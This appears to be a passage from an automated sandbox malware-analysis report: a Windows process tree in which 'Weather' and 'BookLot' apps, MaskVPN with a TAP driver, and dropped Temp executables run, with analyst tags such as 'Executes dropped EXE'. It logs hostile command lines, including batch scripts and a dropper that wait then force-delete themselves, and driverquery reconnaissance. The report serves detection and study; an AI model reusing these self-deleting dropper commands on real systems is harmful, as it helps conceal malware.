                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8876
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2520 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8032
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --mojo-platform-channel-handle=2060 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5588
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --mojo-platform-channel-handle=3464 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4300
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1876 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6768
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --mojo-platform-channel-handle=3600 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4436
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --mojo-platform-channel-handle=1868 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7760
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --mojo-platform-channel-handle=3216 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7104
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --mojo-platform-channel-handle=3448 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8008
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEC6C8.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6216
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8400
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8036
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5064
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEC6C8.bat"
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9204
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEC6C8.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9168
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8116
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEC6B7.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8744
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5980
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6504
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEC6B7.bat"
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8120
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEC6B7.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7432
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8656
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4232
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6140
                                                                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6072
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2924
                                                                                                                                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6600
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5aafee07-65a4-2049-9fd0-966252f9f75e}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:200
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000144"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6040
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5744
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4424
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5400
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8244
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              werfault.exe /h /shared Global\3c0ca2fa21d6452491bdbeaf1356cf5a /t 4732 /p 5400
                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9164
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    werfault.exe /h /shared Global\6914a317677a45c6b4ca4c1d3e464860 /t 7720 /p 8244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1515.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1759.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1759.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\28CE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\28CE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\28CE.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\BookLot\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\BookLot\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\BookLot\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\BookLot\User Data" --annotation=plat=Win32 --annotation=prod=BookLot --annotation=ver=0.0.99 --initial-client-data=0x298,0x294,0x290,0x28c,0x29c,0x721e50d0,0x721e50e0,0x721e50ec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\BookLot\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\BookLot\User Data\Crashpad" --annotation=plat=Win32 --annotation=prod=BookLot --annotation=ver=0.0.99 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1e0,0x1f0,0x1480378,0x1480388,0x1480394
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe" --type=gpu-process --field-trial-handle=1524,13723991899474295402,2815493112647618201,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --gpu-preferences=KAAAAAAAAACAAwDAAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --service-request-channel-token=940835035985523041 --mojo-platform-channel-handle=1536 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\BookLot\gen" --js-flags=--expose-gc --no-zygote --field-trial-handle=1524,13723991899474295402,2815493112647618201,131072 --service-pipe-token=18217143418081778029 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --nwjs --extension-process --disable-client-side-phishing-detection --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=18217143418081778029 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "driverquery /FO list /v"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\driverquery.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            driverquery /FO list /v
